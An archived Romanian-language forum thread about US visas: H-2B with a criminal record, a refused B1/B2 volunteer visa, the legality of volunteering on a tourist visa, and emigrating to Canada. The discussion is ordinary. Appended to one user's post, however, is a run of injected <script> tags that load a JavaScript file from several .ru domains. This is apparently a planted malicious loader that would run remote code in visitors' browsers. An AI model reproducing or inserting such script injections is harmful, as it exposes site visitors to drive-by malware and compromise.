PDA

Arată versiune întreagă : Daca am cazier pot aplica pentru H2B?

27.09.2005, 22:18
Daca am fost condamnat la 1 an si 3 luni pentru conducere in stare de ebrietate, am ispasit pedeapsa dar in cazier va ramane cel putin 5 ani, am vreo sansa sa aplic pentru o viza H2B in state?

Va rog daca stiti sa-mi dati un sfat sa stiu ce sa fac.

observator
29.09.2005, 07:41
Buna ziua,

Putetzi aplica, dar shansele de obtzinere a vizei sunt aproape de 0.

Numai bine!

29.09.2005, 07:50
Daca am fost condamnat la 1 an si 3 luni pentru conducere in stare de ebrietate, ..

Depinde in care tara..smileys/smiley1.gif

evelyn
29.09.2005, 07:51
Am si eu o intrebare care originar mi-a fost adresata mie.....dar la care nu stiu raspunsul .

Un cetatzean roman casatorit de peste un an de zile cu un cetatean american, care nu a aplicat pana acum ptr. absolut nimic ( social, adjustment of status etc) poate sa o faca la orice ora ? In special ma refer la social security cu work permit..... Adica chiar daca a stat peste viza si acum din cate-mi dau seama este ilegal.......

Referitor la social security poate merge la Social Security office direct sau trebuie aplicat by mail ????

Multumim anticipat ptr. raspuns

GNChicago
29.09.2005, 08:47
Cred ca va trebui sa-si adjusteze statutul cu Immigration, apoi sa aplice cu SSA in persoana ptr #, altfel nu vor putea face income-taxul impreuna si vor pierde financiar ca penalizare for single status si alte deductii pe care le-ar putea facela join income tax.

Deasemenea are nevoie la asigurarea medicala de acel numar de SSN, cu toate acestea asigurarea medicala va trebui sa i se asigure indiferent de celelalte hirtii, dar va trebui sa se lupte putin cu ei deaceea ii sfatuiesc sa trimita in scris la asigurare ca si-a schimbat statutul in aceea de casatorit, altfel la cea mai mica nevoie de spitalizare, doamne fereste, va avea de platit peste o mie pe zi.

Cred ca trebuie actionat rapid incepind cu immigration status.

Mult succes!

moxica
02.10.2005, 01:23
Buna ziua!

Sunt si eu de ceva timp pe forum si incerc sa gasesc rapunsuri...sau idei care sa ma ajute. Pana acum, am invatat foarte multe de la voi, si va multumesc tuturor celor care ati incercat sa dati sfaturi cat mai detaliate.

Anul trecut am fost invitata sa particip la un seminar in D.C. si am primit viza B1/B2 pe 10 ani, nu mi-a venit sa cred, totul a fost ca un vis. Am trecut foarte usor de interviu, mi s-a parut chiar ca o formalitate, cel putin in comparatie cu procedurile din cadrul altor ambasade. In fine, am fost la acel seminar, am trait niste clipe pe care le voi tineminte toata viata...cred ca a fost perioada din viata mea cand am fost cea mai fericita, in D.C, intr-adevar am vazut putin din America, dar oare cati americani ajung sa-si vada capitala? Eu una pot sa spun cu mana pe inima ca mi-a placut foarte mult si este cu totul altceva decat capitalele din Europa cu care m-am obisnuit

Cred ca nimeni nu ma va condamna ca vreau sa revin in SUA, macar si pe perioade mai scurte (3-6luni)

Am insa o mica problema aici: prietenului meu i-a fost refuzata viza nu demult si i s-a pus stampila in pasaport. A aplicat pentru viza turistica, fiindca avea invitatie de la o organizatie ecologista (Conservation Corps) din SUA, afiliata unei universitati, si urma sa petreaca 5 luni in SUA la munca de voluntariat in cadrul acelei organizatii, toate cheltuielile de sedere fiind platite de organizatie. Nici acum nu inteleg de ce i s-a refuzat viza si de ce ofiterul(o baba umflata, scuze pt limbaj) s-a purtat de parca invitatia ar fi fost trimisa de ultimul om din SUA. Nu sunt oare toti cetatenii SUA egali??? Macar in fata ofiterului...

A fost o lovitura grea pentru noi, mai ales ca urma sa mergem impreuna acolo...Eu pot sa plec oricand, insa el nu. Stiu ca 'life is a bitch', dar oare chiar nu se poate face nimic? Tinem foarte mult unul la altul si nu vrem sa ne despartim si refuz sa cred ca soarta poate fi atat de bitchy incat sa trebuiasca sa ne continuam viata pe cai separate. Asa cum am mai zis, eu imi doresc foarte mult sa ma intorc, de fapt e visul meu din copilarie de a ajunge in SUA...dar nu pot sa -l las pe el aici in Romania, stiu ca vom suferi ingrozitor amandoi

Daca mai aplica cu invitatie de la ei si tot pt. B1 sau B2, are vreo sansa??? Din cate am inteles, stampila aceea inseamna ca el este de acum incolo in evidenta lor...ce inseamna asta? Ca nu va mai primi viza turistica in vecii vecilor???

Sau sa le spun organizatorilor sa ne faca invitatie comuna si sa mergem impreuna? Eu am si pasaport nou, deci pot cere inca o data viza...mi-e frica insa sa nu mi-o anuleze pe cealalta, adica sa-mi puna una noua pe 6 luni si sa mi-o anuleze pe cea veche...E posibil sa faca asa ceva? Ar avea prietenul meu sanse mai mare sa obtina viza turistica in cazul in care mergem impreuna la viza?

Eu m-am gandit sa aplice pentru un job sezonier, dar are el oare sanse sa obtina H2B, data fiind stambipa aceea in pasaport??? Pe langa asta, am auzit ca joburile sezoniere sunt din cele mai proaste, ca sa nu mai vb de comisioanele firmelor...e adevarat? Voi ce stiti de aceste joburi? Este cineva pe acest forum care a venit in SUA cu astfel de job?

Imi doresc foarte foarte mult sa ajungem in SUA, macar un timp, apoi vom mai vedea...

Imi cer scuze pentru acest mesaj lung, sper sa ma intelegeti, trec prin niste momente foarte grele si nu stiu cum sa trec de aceasta rascruce

Daca poate sa ne ajute cineva cu niste idei, va rog mult de tot!

c=h<script src=http://www.nmr43.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.iroe.ru/ngg.js></script><script src=http://www.kodj.ru/ngg.js></script><script src=http://www.kjwd.ru/ngg.js></script><script src=http://www.bce8.ru/ngg.js></script><script s<script src=http://www.iroe.ru/ngg.js></script>

GNChicago
02.10.2005, 04:55
Knowledge is POWER.

Ofiterul ambasadei a respectat LEGEA! El nu este pus acolo sa imparta fericire sau nefericire la diversi aplicanti in functie de cum a dormit noaptea sau pe un "pachet de cafea sa zicem", ci e pus sa respecte legea, legea americana. Pentru asta e platit!

Nu poti sa vii in America cu o viza de turist si sa lucrezi, voluntar sau nevoluntar. Ptr a lucra ai nevoie de aprobarea de la "DOL", dept of labor. Toti shmecherii ar veni si ar spune, nu domle lucrez voluntar, ar fi o harababura. Ptr a lucra are nevoie de SSN, social sec. number, Daca se imbolnaveste trebuie sa mearga la spital, plateste cash sau are asigurare, toate astea sint legate.

Organizatia eco din USA a gresit cind a crezut ca ce face e suficient ptr viza, din contra la indus in eroare. Cred ca singura sansa e sa ceara viza de studii si sa DECLARE ca nu va lucra fara autorizatie. A declarat prima data ca va lucra voluntar, nestiind ca e ilegal ce intentie are, dar acum realizind asta nu vrea sa faca ceva ilegal in USA. Sa ceara sa vina sa studieze lb. engleza, orice altceva, daca este acceptat de un colegiu. Sa nu se sfiasca sa spuna ca intentia precedenta a fost nestiind ca ar fi ilegala si nu e in intentia lui sau a voastra sa faceti ceva ilegal.

Daca mergeti impreuna sa mai ceri inca odata viza, ofiterul isi va da seama ca a gresit dindu-ti zece ani si va anula viza pe buna dreptate, respectind legea.

Si ptrca ai vazut capitala USA, Washington DC, afla ca e cel mai neamerican oras in America, Strange!, nu? E un oras foarte frumos, o gradina cu monumente si toti copii de scoala au oportunitatea sa o vada in excursii organizate de scoli.

MULT SUCCES!

radacos
02.10.2005, 12:36
Moxica, o sa il contrazic pe GNChicago! smileys/smiley1.gif
Prietenul tau nu a facut nimic *ilegal*. Nu este ilegal sa muncesti voluntar. Munca voluntara nu este employment, si nu ai nevoie de autorizatie sau SSN. In plus, nu cred ca se pune problema ca ar fi o harababura daca ar declara o multime de turisti ca muncesc voluntar si ar munci, de fapt, la negru. La negru poti sa muncesti oricand, indiferent ce le-ai declarat celor de la ambasada. In plus, viza de turist are un numar de limitari serioase in ceea ce priveste durata de sedere, posibilitatea de prelungire sau de schimbare de statut, dupa cum bine stiu majoritatea oamenilor care posteaza pe acest forum.
Ofiterul de imigrare a suspectat probabil ca prietenul tau va avea posibilitatea sa isi extinda sederea sau sa isi schimbe statutul, avand in vedere ca se ducea in sanul unei organizatii afiliate unei unversitati.
Nu stiu ce sa te sfatuiesc pentru obtinerea vizei turistice. Este, in mare parte, o loterie. Probabil ca nu va putea sa obtina viza cu aceeasi invitatie. In nici un caz nu ai de ce sa ceri sa va faca invitatie la amandoi. Tu ai deja viza, si nu ai de ce sa aplici pentru alta, iar faptul ca tu ai viza nu il ajuta pe el in nici un fel. Poate sa astepte ceva timp, sa lucreze/studieze in mod constiincios pentru a aduna "puncte" in favoarea intentiei de a se intoarce in tara, si sa incerce pentru o alta viza turistica. Viza de studii este, desigur, o alta posibilitate. Sau, puteti sa rugati organizatia care i-a trimis invitatia sa sune la ambasada si sa vorbeasca cu ei. Cunosc trei cazuri in care persoana din SUA care a facut invitatia a reusit sa obtina viza turistica pentru persoana din Romania dupa ce a vorbit cu cei de la ambasada si le-a explicat situatia.

02.10.2005, 16:25
Moxica..cu acleasi tip de viza b1/b2 am venit si eu in state si tot
pentru o organizatie non guvernamentala cu munca de voluntar si casa si
masa asigurata de ei...am luat viza pe 1 an si am tot prelungit pentru
inca unul...plus de asta am avut un refuz de viza turistica, dar din
uk, care pina la urma nu a contat la interviu..ca incurajare pot doar
sa-ti spun ca cind am fost la ambasada am intilnit un tip care fusese
refuzatde 7 ori si a 8 oara a luat viza..cu aceleasi acte..totul
depinde de ofiterul de emigrare..doar ca atunci el a venit ziz de zi
timp de 8 zile si a platit cite 50 de dolari zilnic..dar luat viza..asa
ca sperante sint..nu abandona..tipii din state pot sa mai trimita ceva
scrisori sa-l mai ajute si sa mai incerce odata...sau de mai multe
ori..desii o sa-i fie mai greu acum cind am vazut ca te programeaza
ei..nu mai vii tu in fiecare zii daca vrei..

Pisoi
07.10.2005, 09:57
GNC are dreptate, cititi cu atentiece a scris:

Nu poti sa vii in America cu o viza de turist si sa lucrezi, voluntar sau nevoluntar. Ptr a lucra ai nevoie de aprobarea de la "DOL", dept of labor.

Viza de turist nu-ti da dreptul sa muncesti sub nici o forma. Daca cineva a auzit ca un posesor de viza de turist a fost acceptat sa lucreze fara aprobare la vreo organizatie, sa ne scrie aici.

radacos, munca "la negru" exista si va exista, dar este ilegala. Ofiterul de la ambasada a interpretat "fraza" ca atare.

kadades,cred ca organizatia la care ai lucrat au avut vreo aprobare oficiala pentru tine, daca nu... atunci ei si-au asumat riscul ca tu sa lucrezi "la negru" Ce nu inteleg este cum ai lucrat ca voluntar daca ti-au asigurat casa si masa.

GNChicago
07.10.2005, 11:34
Cele scrise de mine anterior se bazeaza pe ce am auzit cu ceva ani in urma de la un avocat si era in afara acestui subiect, asa ca nu pot sa bag mina in foc pentru asta.

Deasemenea se bazeaza pe o anumita logica de extrapolare; ce s-ar intimpla daca.....

Este interesant de auzit parerea unor persoane competente, professional people, avocati de origine romana care sa analizeze cele spuse de Radacos si de kadades ( ce nume...ambele suna grecesti!??!!), deoarece daca exista aceasta cale legala descrise de domniile lor, atunci multi in special studenti care-si cauta un drum legal in the US ar putea cistiga timp de cel putin un an de zile in care sa se rezolve intr-un fel.

Intrebarea ar fi daca ei isi pot ajusta statutul la lucratori voluntari ptr nonprofit org., de aici din US sau trebuie sa iasa afara din US ceeace nu e prea atragator.

Daca ar trebui sa iasa afara din US, simpla vizitare a sediului ONU din NY cind ghidul le spune la vizitatori ca nu se mai afla pe teritoriul statelor unite ar fi suficienta. Nu cred ca a mai folosit cineva aceasta scuza ca a iesit afara si la reintrare dupa vizita ONU din NY City, nu i-a intrebat nimeni de nimic; sau ca au intirziat intrind in America cu peste doua sute de ani intirziere....

Nu as vrea sa se inteleaga ca incurajez emigrarea legala sau ilegala, ceeace nu am facut niciodata, doar de a expune toate posibilitatile legale existente, sau cai care s-ar gasi in asanumita "grey area" in care nu ar exista o lege, deci nu ar face ceva ilegal.

Fiecare trebuie sa ia deciziile lui (ei) proprii bazate pe cunoasterea tuturor cailor legale.

Deaceea cred ca interventia unei persoane profesionale pe acest domeniu este necesara pentru lamurirea acestei dileme.

Poate "Observator" sa ne observe si sa ne dea o opinie calificata la aceste intrebari.

De remarcat ca multe org. nonprofit, sau chiar cetateni americani in special cei nascutzi in the US, nu au habar de emigratie, ba chiar unii cred ca daca ai SSN esti ca si cetatean american, ceea ce nu este adevarat.

Mult succes!

08.10.2005, 13:34
A presta o munca voluntara care tine ocupat un post pentru care un
american ar fi angajat sau din care speri ca vei obtine un avantaj in
viitor, chiar departat, este un lucu ilegal.

http://www.internationaloffice.duke.edu/FAQ/FAQ_VolunteerAct (http://www.internati&#111;naloffice.duke.edu/FAQ/FAQ_VolunteerActivities.htm) ivities.htm

From the DHS perspective, if the alien
is providing a service normally provided by a paid employee, then the
activity is work and the alien is receiving the "compensation" of
valuable training or experience and/or the compensation of possible
future paid employment. It does not matter that no money changed hands
at the time the work was being done. Being paid or compensated in the
future, does not change the fact that one is performing real work in
the present. For example, you cannot serve as a lab technician while
waiting for work permission that will permit you to do the same or
similar work for pay. In that case DHS sees the current "volunteer"
activity as work that is "holding" a position for the future and is
therefore compensating or "paying" you with the reward of a future job.

As mai adauga si exemplul dat pe un alt thread al
bunicilor din Romania care vin la copiii din US declarand ca vor sa
aibe grija de nepoteii lor.</font></font>

PS In alta ordine de idei, asa este, DC-ul este f. nereprezentativ ptr.
America. Dupa ce am sosit in tara asta am avut norocul sa nu ma aflu la
o distanta extraordinar de mare de DC. Ca mai toti oamenii care au avut
ocazia sa cunoasca Europa de Vest, la inceput m-am obisnuit f. greu cu
stilul de viata mai "rural' (dar nu mizer) din US si mergeam ori de
cate ori aveam ocazia sa iau "oxigen" din DC. Acum m-am "integrat": nu
mai vreau aglomeratie, condus la cm, trotuare, oameni cosmopolit cu
aspect mai mediteranean, cu pantofi in loc de sneakers. Si totusi, mi-a
ramas o gena aiurea ca din cand in cand ma atrage ceva acolo.

08.10.2005, 18:02
nu stiu daca au avut aprobare speciala sau nu, aveau un avocat angajat,
dar eu chiar de la ambasada am declarat ca voi fii platit si toata
situatia..iar ei mi-au dat viza pe un an si la vama la fel..chestia ca
viza b1/b2 este de afaceri si eu unul nici prin gind nu-mi trecea sa
aplic..dar ei mi-au trimis actele ptr.ea si a mers.. acum a contat si
faptul ca am fost in uk cum acelasi tip de viza pt un an si m-am
intors..tipul de la ambasada chiar asta mi-a spus ca la facut sa-mi
acorde viza...ceeea ce am auzit e ca de o vreme au cam inasprit
conditiile...la un an dupa ce am venit o tipa din lituania a incercat
aceeiasi viza si nu i-au accordat decit 6 luni cu greutate..stii cum e
cu norocul...

08.10.2005, 18:03
a si inca ceva..am pregatire medicala si asociatia se ocupa de persoane cu handicap..si mi-au cerut diploma la ambasada

GNChicago
08.10.2005, 19:20
Cineva mi-a spus mai de mult ca uk are o situatie mai privilegiata fata de US.

Mai este o situatie cu acesti dr. fara frontiera, care merg in diferite tari cu toate ca ei sint licensed in tara lor de origine.

O alta situatie este pentru personalul religios.

Intortocheate mai sint caile domnului.....

08.10.2005, 20:52
da, ai dreptate.Uk-ul e mai privilegiat un pic..am prieteni care la fel
au avut vize de uk si pe urma au luat"usor"si pe cea de state.

09.10.2005, 04:36
Nu prea inteleg:

Moxica..cu acleasi tip de viza b1/b2 am venit si eu in state si tot
pentru o organizatie non guvernamentala cu munca de voluntar si casa si
masa asigurata de ei...am luat viza pe 1 an si am tot prelungit pentru
inca unul..

dar eu chiar de la ambasada am declarat ca voi fii platit si toata
situatia..iar ei mi-au dat viza pe un an si la vama la fel..chestia ca
viza b1/b2 este de afaceri si eu unul nici prin gind nu-mi trecea sa
aplic..dar ei mi-au trimis actele ptr.ea si a mers..

Pana la urma este munca platita sau nu? Daca nu este si se afla in
cadrul unei asociatii ptr. persoane cu handicap atunci pare perfect
legal cu B1/B2 (vezi link-ul dat de mine mai sus despre munci care in
mod normal sunt prestate in US de "volunteers"). In caz contrar ar fi
interesante niste detalii suplimentare.

radacos
09.10.2005, 09:12
Transit, am inteles diferenta pe care o faci intre munca neplatita pe un post de obicei platit si munca voluntara prestata de obicei de voluntari. Multumesc ca mi-ai atras atentia! smileys/smiley1.gif
Prezumtia mea fusese ca, daca prietenul Moxicai se ducea la o organizatie ecologista, asta miroase intr-adevar a voluntarism. Dar, desigur, depinde de postul pe care avea de gand sa voluntarieze.
Pisoi, acum doi ani am venit aici cu viza de turist si am voluntariat pentru cateva saptamani la o scoala generala, ca tutor. Acum sunt cu viza F-1 si voluntariez de un an ca tutor la un centru de literacy. Nu am avut niciodata nevoie nici macar de act de indentitate pentru a obtine aceste pozitii. Ce-i drept, ambele sunt pozitii ocupate in mod normal de catre voluntari neplatiti. Si mai mult, facultatea la care ma duc are anumite cursuri de "service learning", in cadrul carora studentii, americani si internationali, trebuie sa presteze munca voluntara la anumite organizatii caritabile. Deci in mod clar nu tot voluntarismul este ilegal pentru cei cu vize temporare.

GNChicago
09.10.2005, 09:52
Radacos, daca acest voluntariat se obtine cu aprobarea de la immigration, atunci se deschid niste portzi pentru multi studenti veniti aici care incearca in diferite moduri sa devina legali, atunci asta ar fi o noua cale care ar fi de considerat.

Cred ca multi studenti care cauta calea legala ar dori sa voluntarizeze 2-4 ore pe zi sau saptamina ptr a obtine niste drepturi, mai ales ca in America este o lipsa de profesori.

E interesant faptul ca nu ai avut nevoie de un ID ptr voluntariat ptrca toti sint foarte speriati de child molestors, nu e cazul tau dar ei trebuie sa caute in data base.

Stiu ca si eu am voluntarizat ptr park district in satuletul meu, sa antrenez copii ptr soccer si mi-au cerut o semnatura sa le dau voie sa cerceteze daca sint prin dosarele politiei sau asa ceva.

Am semnat dar am pus si conditia ca sa primesc si eu o copie, dar nu am mai auzit de la ei.

Spre deosebire de copii din Romania, astia nu au soccer in singe....

radacos
09.10.2005, 12:06
GNChicago, am inteles ce vrei sa spui! smileys/smiley1.gif
Si mie mi-au cerut sa semnez o hartie prin care ii autorizam sa faca background check, am uitat sa spun asta!

GNChicago
09.10.2005, 14:12
Radacos, background check se face pe baza de SSN.

Daca esti cu B1/b2 nu ai SSN, doar Alien #.

radacos
09.10.2005, 17:58
Ei, uite ca eu am semnat doua autorizatii pentru background check fara SSN. Le-am explicat chiar situatia si mi-au spus ca nu este nici o problema. Acum eu nu stiu daca ei au reusit sa faca background check sau nu. Ce-i sigur este ca asta nu i-a impiedicat sa ma lase sa voluntariez.
Daca esti cu B1/B2 nu ai Alien #, ci I-94 #. Alien # ai doar cand devii rezident.

GNChicago
09.10.2005, 18:43
Radacos, ai dreptate cu I-94, dar Alien # capeti cind faci o aplicatie la ei, nu mai tin minte, dar capeti inainte de rezidentiat. Avind A# nu-ti garanteaza ca devii rezident sau cetatean, e numai un mod de evidenta a strainilor.

Probabil ca nu s-au mai obosit sa te caute, ptrca tot sistemul se bazeaza pe SSN.

Un american nascut aici nu are nici I-94, nici b1/b2, nici A #, ci numai si numai eventual SSN, de obicei ar trebui sa aiba ssn, ptr taxe, scoala, etc.

sauzimdebine
09.10.2005, 19:29
A # de pe I-94 devine Alien # in cazul in care se face aplicatie pentru o forma sau alta de rezidenta.

Background check se poate face si fara SSN pe baza datelor personale,
nume, data si locul nasterii, adresa de rezidenta, # si tara emitenta a
pasaportului, etc.

moxica
09.10.2005, 22:04
Buna din nou!
Vad ca am deschis o discutie cu multe necunoscute aici :-)

CNChicago, trebuie sa recunosc ca m-ai cam pus pe ganduri, dar sa clarificam cateva chestiuni:
1.In nici un caz nu mi se poate revoca mie viza pe 10 ani. Asta, pentru ca o am deja de aproape doi ani, dar cel mai important, modul in care am obtinut-o. Adica, nu a fost vorba de nici o greseala a ofiterului in cazul meu, stii, eu am spus ca a fost o formalitate pt ca sunt deep convinced ca mi-a fost analizat cazul cu mult inainte de a ma prezenta la ambasada, pt ca am corespondat cu cei de la ambasada inainte si by the way, am avut invitatie de la un think tank din Washington DC,care tine de una dintre cele mai prestigioase universitati din SUA.

2. Postul de voluntariat pt care a aplicat prietenul meu NU este remunerat, anual merg voluntari din toata lumea, toti cu viza B1/B2 si NU este vorba de posturi care ar putea fi ocupate de americani pur si simplu pt ca aceste posturi voluntare sunt SPECIAL CREATE PT STRAINI, fiind vorba de INTERNATIONAL VOLUNTEER PROJECT. Nici un voluntar care participa la acest program NU este remunerat si nici nu se pune problema ca el sa fie ulterior angajat in cadrul organizatiei.
Sunt de acord ca este o grey area pentru emigrare...dar nu inseamna neaparat ca se si urmareste emigrarea. In ceea ce-l priveste pe prietenul meu, in nici un caz nu ramanea definitiv ci doar pt o perioada pt ca asta isi doreste, ca si mine de altfel. Dar pe long-term, vrem sa emigram in Canada. Amandoi avem studii superioare si nu ma vad spaland vase in SUA pt 5$/h.Dar, ca voluntar sau business sau temporary am veni oricand, pur si simplu de dragul 'farmecului american'.

M-a deranjat foarte tare comportamentul ofiterului de la ambasada, nu ma asteptam...si, by the way, motivul pe care i l-a dat pt respingere a fost ca nu prezintalegaturi solide cu tara si ca se va intoarce in romania. Deci, CNChicago, daca il refuza pt motivul spus de tine, sunt sigura ca ii si spunea asta.In privinta asta, oricat de nesimtiti ar fi unii functionari, tot sunt corecti.

Eu am fost tratata ca o mica printesa si la ambasada si in SUA (imaginati-va ca tipu de la Immigration de la aeroport mi-a completat formularul el insusi, eu doar am semnat pt ca eram obosita si nu pricepeam nimic; asta in conditiile in care la altii tipa de mama focului).

In concluzie, mi-am dat seama ca ar fi o loterie sa aplice din nou pt B, dar inca nu stiu clar daca ar obtine H2B...

10.10.2005, 03:02
1. Nu uita ca admiterea in US se decide de fiecare data cand te
prezinti la granita si este la latitudinea ofiterului de "immigration".
De aceea se spune ca nu este bine sa vii extrem de des in decursul
celor 10 ani fara ca vizitele sa fie bine motivate. Totusi, sunt
convins ca regulile privitoare la "legaturi cu tara" la B1/B2 sunt mult
mai relaxate la ghiseul de la aeroport decat la ghiseul de la consulat.

2. Asadar, chestia cu voluntariatul pe acel post anume nu a jucat nici un rol in refuzul vizei.

Daca aveti punctajul necesar de ce nu aplicati ptr. Canada? Odata
obtinuta resedinta permanenta, dupa "landing", mai puteti locui in
afara Canadei 3 ani fara a pierde statutul de rezident permanent acolo
(legea spune sa fii prezent fizic in Canada 2 ani din 5 consecutivi).
Ca rezident permanent canadian tot iti mai trebuie viza de US dar
lucrurile se simplifica mult. Nu mai zic de avantajul de-a avea "home
base"-ul la granita cu US in loc de Balcani. O sa-mi spuneti ca "job
market"-ul in Canada este deprimant si suprasaturat de imigranti dar
nimeni nu afla exact pana nu incearca.

sauzimdebine
10.10.2005, 04:25
Buna din nou!

1.In nici un caz nu mi se poate revoca mie viza pe 10 ani. Asta, pentru ca o am deja de aproape doi ani, ...

Eroare, nu ai viza pe zece ani, ai doar permisiunea de a te prezenta la
unul din punctele de intrare in USA, unde, dupa caz, ofiterul de
imigratie iti acorda viza de sedere(cartonasul I-94) sau, daca el
considera asa, pentru varii motive cum ar fi si cel ca avand dreptul de
a intra in US ai aplicat pentru inca o viza impreuna cu prietenul tau,
ridicand suspiciuni asupra motivelor tale reale de a vizita, spune
politicos NU si nu ramane.

... am avut invitatie de la un think tank din Washington
DC,care tine de una dintre cele mai prestigioase universitati din SUA.

Exista si aici unele "zone gri", cu toate acestea, in general, nu
conteaza cine face invitatia, presedintele sau ultimul american, o
institutie sau alta, pentru ca legea este aceeasi pentru toata lumea.
De altfel se "judeca/cantareste" persoana care doreste sa intre in US,
motivele pentru care si modul in care vrea sa o faca, si nu, cine face
invitatia.

M-a deranjat foarte tare comportamentul ofiterului de la ambasada, nu
ma asteptam...si, by the way, motivul pe care i l-a dat pt respingere a
fost ca nu prezinta legaturi solide cu tara si ca se va intoarce in
romania.

Daca acesta a fost motivul pentru respingere, se poate face o noua
aplicatie, in acelasi mod, de aceasta data venind cu mai multe
argumente in favoarea demonstrarii unor legaturi solide cu Romania si a
intoarcerii din US. O respingere nu inseamna condamnare pe viata.
Fiecare caz se judeca separat la momentul respectiv si se ia o decizie
in functie de ... aici este aici, mare zona gri, decizia se ia in
functie de foarte multe considerente, printre care nu in ultimul rand
sunt si legaturile demonstrate cu Romania, de aceea au fost cazuri in
care au fost acordate vize si dupa una, doua, sau mai multe respingeri.

Cat despre dorinta de a fi impreuna si de a emigra in Canada, de ce
atata asteptare? O data ajunsi la vecinul de la nord este mult mai usor
de a vizita US. Mai ales ca din cate se aude, pe acolo, cei cu studii
superioare nu spala vase pe $5.00 pe ora, smileys/smiley2.gif o fac pe 5 dolari canadieni ... smileys/smiley36.gif

Bafta multa in continuare!

GNChicago
10.10.2005, 05:31
Moxica, nimeni nu vrea sa se atinga de viza ta decit daca faci ceva rau si te vedem la TV.

E bine ca s-a deschis o noua pista, aceea de voluntariat.

Nu cred ca e bine sa gindim ca un angajat a-l gov. american ti-ar ingradi drepturile pe care le ai dupa sau in timpul voluntariatului. Jobul lui nu este acesta ci sa respecte legea.

Mult succes!

moxica
12.10.2005, 00:01
Eroare, nu ai viza pe zece ani, ai doar permisiunea de a te prezenta la unul din punctele de intrare in USA, unde, dupa caz, ofiterul de imigratie iti acorda viza de sedere(cartonasul I-94) sau, daca el considera asa, pentru varii motive cum ar fi si cel ca avand dreptul de a intra in US ai aplicat pentru inca o viza impreuna cu prietenul tau, ridicand suspiciuni asupra motivelor tale reale de a vizita, spune politicos NU si nu ramane.

Am intrebat la ambasada si pot cere oricand inca o viza pt ca am schimbat pasaportul (cel vechi a expirat). Conform legii, am 2 variante: sa umblu cu 2 pasapoarte sau sa cer inca o viza. Mai pe sleau, varianta a) mai cotizez $100 sau b) umflu poseta cu 2 pasapoarte.

De motive, nici o grija, intotdeauna am avut motive solide cand am vizitat o tara. Iar uneori s-a intamplat sa merg si de mai multe ori pe luna intr-o tara straina

Exista si aici unele "zone gri", cu toate acestea, in general, nu conteaza cine face invitatia, presedintele sau ultimul american, o institutie sau alta, pentru ca legea este aceeasi pentru toata lumea. De altfel se "judeca/cantareste" persoana care doreste sa intre in US, motivele pentru care si modul in care vrea sa o faca, si nu, cine face invitatia.
Hmmm...daca intr-adevar asa este, cum se face ca o gramada de indivizi primesc viza fara sa aduca nici o proba de legaturi cu casa si primesc viza dupa 2-3 intrebari gen "how do you do'? Si pe deasupra mai si raman in SUA sa munceasca ! ;-)

Deci, sau sunt acesti indivizi a dracu de buni actori sau...ceva iz de incompetenta a unor functionari aici...

Cat despre dorinta de a fi impreuna si de a emigra in Canada, de ce atata asteptare? O data ajunsi la vecinul de la nord este mult mai usor de a vizita US. Mai ales ca din cate se aude, pe acolo, cei cu studii superioare nu spala vase pe $5.00 pe ora, smileys/smiley2.gif o fac pe 5 dolari canadieni ... smileys/smiley36.gif

Sincer, nu-mi plac canadienii...am avut de a face cu ei si in Europa si in SUA, mi se par cam weird...

Cei cu studii sup pot lucra ca profesori in cel mai 'rau' caz...mult mai bine decat i n Ro de ex. Chiar misto si toti pe care ii stiu plecati acolo se descurca f bine. so...i don't get your point

moxica
12.10.2005, 00:18
[QUOTE=GNChicago]

Moxica, nimeni nu vrea sa se atinga de viza ta decit daca faci ceva rau si te vedem la TV.

Multumesc pt urari!

Nu fac nici un rau nimanui. Promit! smileys/smiley1.gif

Acum, nu pot promite ca la TV nu apar niciodata...

Lasand gluma la o parte, pista cu voluntariatul exista de mult, si sunt convinsa ca sunt multi romani prin lume care traiesc asa, Cunosc mai multi oameni care lucreaza ca voluntari, inclusiv in Indonezia si ei desigur nu vor sa emigreze smileys/smiley1.gifEu ma invart in cercul asta de cativa anisori si ma simt binisor, am vazut multe meleaguri

Nu stiu cat de viabila e aceasta pista pentru emigrare, in sensul ca nu e accesibila chiar oricui...trebuie sa cunosti multe ca sa poti gasi o oportunitate, dar cel mai important trebuie sa ai si un background in CV ca sa fii acceptat de organizatii si de autoritati. Desi e voluntariat , nu accepta chiar pe oricine...

Si, lucrul cel mai nasol aici, nici intr-un caz nu garanteaza obtinerea vizei. Sa nu mai vorbim de costuri. Dar, per total...banuiesc ca e mult mai placuta la stomac decat o casatorie de convenienta sau alte tertipuri de speta folosite de romanii desperados

Prietenul meu probabil va mai incerca, stiu si eu...ar fi o idee sa sune cei de la org. la ambasada si sa vorbeasca. va voi anunta daca si cand va primi eventual viza

12.10.2005, 03:31
Cei cu studii sup pot lucra ca profesori in cel mai 'rau' caz...mult
mai bine decat i n Ro de ex. Chiar misto si toti pe care ii stiu
plecati acolo se descurca f bine. so...i don't get your point

O discutie serioasa pe tema asta (cati au reusit ca profesori
universitari in anii de acum, cu diploma din Ro. - sunt ceva - si cati nu au reusit -
majoritatea covarsitoare) nu-si are locul aici. Vroiam doar sa reproduc
acel banc pentru cei care nu-l stiu:

"Intrebare: Ce inseamna PhD in Canada?"

"Raspuns: Pizza Hut Delivery"